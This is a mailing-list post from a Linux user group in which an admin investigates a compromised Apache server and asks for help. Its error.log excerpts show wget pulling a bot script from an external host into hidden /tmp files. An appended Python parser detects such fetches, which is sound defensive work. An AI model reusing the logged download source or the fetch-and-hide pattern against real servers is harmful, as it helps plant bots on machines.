Here's what I found out with more digging in the logs.

There are 3 hidden files (attached with this message) in /tmp/:

1) .fuhrer
2) .fuhrer2
3) .fuhrer3

ns1:/var/log/apache2# ls -la /tmp/
total 56
drwxrwxrwt  5 root     root      4096 Nov 25 07:46 .
drwxr-xr-x 26 root     root      4096 Nov 25 04:49 ..
drwxrwxrwt  2 root     root      4096 Nov 21 23:32 .ICE-unix
drwxrwxrwt  2 root     root      4096 Nov 21 23:32 .X11-unix
-rw-r--r--  1 www-data www-data  3673 Nov 25 00:30 .fuhrer
-rw-r--r--  1 www-data www-data 18698 Nov 25 06:11 .fuhrer2
-rw-r--r--  1 www-data www-data     0 Nov 25 08:10 .fuhrer3
-rw-------  1 www-data www-data    71 Nov 23 03:28 sess_07f541a848d0dd70fc87c3aed1691c87
-rw-------  1 www-data www-data   864 Nov 23 01:55 sess_8092654d49176bb860dca7fad5f50cce
-rw-------  1 www-data www-data   342 Nov 22 23:56 sess_e5e56ebacf7fcd31ea42d829e1f1f4fd
drwxrwxrwx  3 www-data www-data  4096 Nov 23 01:28 yappa-ng_cache

All these 3 are Perl scripts, so now it is clear that these are the Perl scripts which are running from within Apache (I've enabled mod_perl in my Apache installation) and eating up the CPU cycles.

Now let's look a little at /var/log/apache2/error.log:

Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                  100%  210.37 KB/s

08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]

--08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                  100%  211.06 KB/s

08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]

--08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                  100%  210.52 KB/s

The logs show that the guy uploaded the files to /tmp and hid them.

In my first mail, the logs showed a lot of "sh" defunct processes executed from within Apache. Is this an attempt to gain a shell through the web server?

Please suggest what more I should look for and how to tackle this attack.

Regards,
rrs

-- 
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is research."
"Necessity is the mother of invention."

_______________________________________________
ilugd mailinglist -- ilugd@lists.linux-delhi.org
http://frodo.hserus.net/mailman/listinfo/ilugd
Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/ilugd@lists.linux-delhi.org/
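As an added example (not part of Ritesh's mail or the list's tooling), here is a defender-side parser that pulls wget transcripts of the kind quoted above out of an Apache error.log and flags fetches that were saved as dot-files under /tmp. The sample log is constructed from the lines in the mail; the second fetch is a made-up benign one for contrast, and the regexes assume the classic wget 1.x stderr format shown on the page.

```python
import posixpath
import re

# Constructed sample: first fetch copied from the mail, second one invented as a benign contrast.
SAMPLE_ERROR_LOG = """\
--08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]

--08:09:12--  http://mirror.example/updates/site.tar.gz
           => `/var/www/site.tar.gz'
08:09:13 (95.00 KB/s) - `/var/www/site.tar.gz' saved [4096/4096]
"""

HEADER_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")            # --HH:MM:SS--  URL
DEST_RE = re.compile(r"^\s*=> `([^']+)'")                            #   => `path'
SAVED_RE = re.compile(r"^\d\d:\d\d:\d\d \([^)]*\) - `([^']+)' saved \[(\d+)/(\d+)\]")

def parse_wget_fetches(log_text):
    """One record per wget fetch found in the log; wget writes progress to stderr,
    which is why a script shelling out from Apache leaves this trail in error.log."""
    fetches, current = [], None
    for line in log_text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = {"time": m.group(1), "url": m.group(2), "dest": None, "bytes": None}
            fetches.append(current)
            continue
        m = DEST_RE.match(line)
        if m and current is not None:
            current["dest"] = m.group(1)
            continue
        m = SAVED_RE.match(line)
        if m:
            # Attach the byte count to the most recent unfinished fetch for that path.
            for rec in reversed(fetches):
                if rec["dest"] == m.group(1) and rec["bytes"] is None:
                    rec["bytes"] = int(m.group(2))
                    break
    return fetches

def flag_hidden_tmp_drops(fetches):
    """Fetches written as dot-files under /tmp, the pattern seen with .fuhrer*."""
    return [r for r in fetches if (r["dest"] or "").startswith("/tmp/")
            and posixpath.basename(r["dest"]).startswith(".")]
```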